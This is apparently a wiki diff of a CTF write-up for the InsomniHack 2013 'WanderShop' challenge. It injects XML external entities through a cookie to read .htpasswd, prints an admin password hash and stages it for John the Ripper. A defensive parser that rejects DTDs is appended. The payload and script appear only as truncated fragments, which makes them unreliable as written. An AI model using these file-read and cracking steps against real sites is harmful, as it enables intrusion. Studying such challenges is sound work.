
InsomniHack-2013/Web2/WanderShop

116 bytes added, 11:05, 26 March 2013
</pre>
* We can then inject XML through the cookie. We use [https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing XML external entities], which allow us to manipulate local files and display the result in the XML.
<syntaxhighlight lang="xml">
<!DOCTYPE basket
[
<item type="5" name="asd">&item;</item>
</basket>
</syntaxhighlight>
* The resulting XML is parsed and displayed on the paying page, so we put the content of the .htpasswd file in an item element, which is displayed in the table.
* Here's the HTML result
<syntaxhighlight lang="html4strict">
<!DOCTYPE html>
<html lang="en">
</body>
</html>
</syntaxhighlight>
* The password is in CRYPT format, which is easily brute-forced with John the Ripper
echo 'admin:sQcHhNWX6v1VM' > /tmp/pass
* Complete script
<syntaxhighlight lang="python">
#!/usr/bin/env python
r = requests.get(url + 'checkout.php', cookies=cookie)
print r.content
</syntaxhighlight>
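The injection above works because the server parses cookie-supplied XML with DTD processing enabled. As an added example (not part of the original write-up or the challenge code), this is a Python sketch of a basket parser that refuses any DOCTYPE or entity declaration before reading the items. The <code>basket</code>/<code>item</code> layout comes from the page; <code>parse_basket</code>, <code>UnsafeXML</code> and both sample documents are constructed for illustration.

```python
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when the document carries a DTD or an entity declaration."""


def parse_basket(xml_text):
    """Return [(type, name, text), ...] for each <item>, refusing any DOCTYPE."""
    items, current = [], None

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # A client-supplied basket never needs a DTD, so reject it outright.
        raise UnsafeXML("DOCTYPE not allowed in basket XML")

    def forbid_entity(*args):
        raise UnsafeXML("entity declaration not allowed in basket XML")

    def start(name, attrs):
        nonlocal current
        if name == "item":
            current = [attrs.get("type", ""), attrs.get("name", ""), ""]

    def text(data):
        if current is not None:
            current[2] += data

    def end(name):
        nonlocal current
        if name == "item" and current is not None:
            items.append(tuple(current))
            current = None

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.StartElementHandler = start
    parser.CharacterDataHandler = text
    parser.EndElementHandler = end
    parser.Parse(xml_text, True)
    return items


# Constructed sample cookies: a plain basket, and one that declares an entity.
BENIGN = '<basket><item type="5" name="asd">1</item></basket>'
WITH_DTD = ('<!DOCTYPE basket [<!ENTITY item "constructed">]>'
            '<basket><item type="5" name="asd">&item;</item></basket>')
```

Exceptions raised inside the expat handlers propagate out of <code>Parse()</code>, so the document is rejected before any entity is expanded.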
== See also ==
* [[InsomniHack-2013]]
ControlGroup, administrator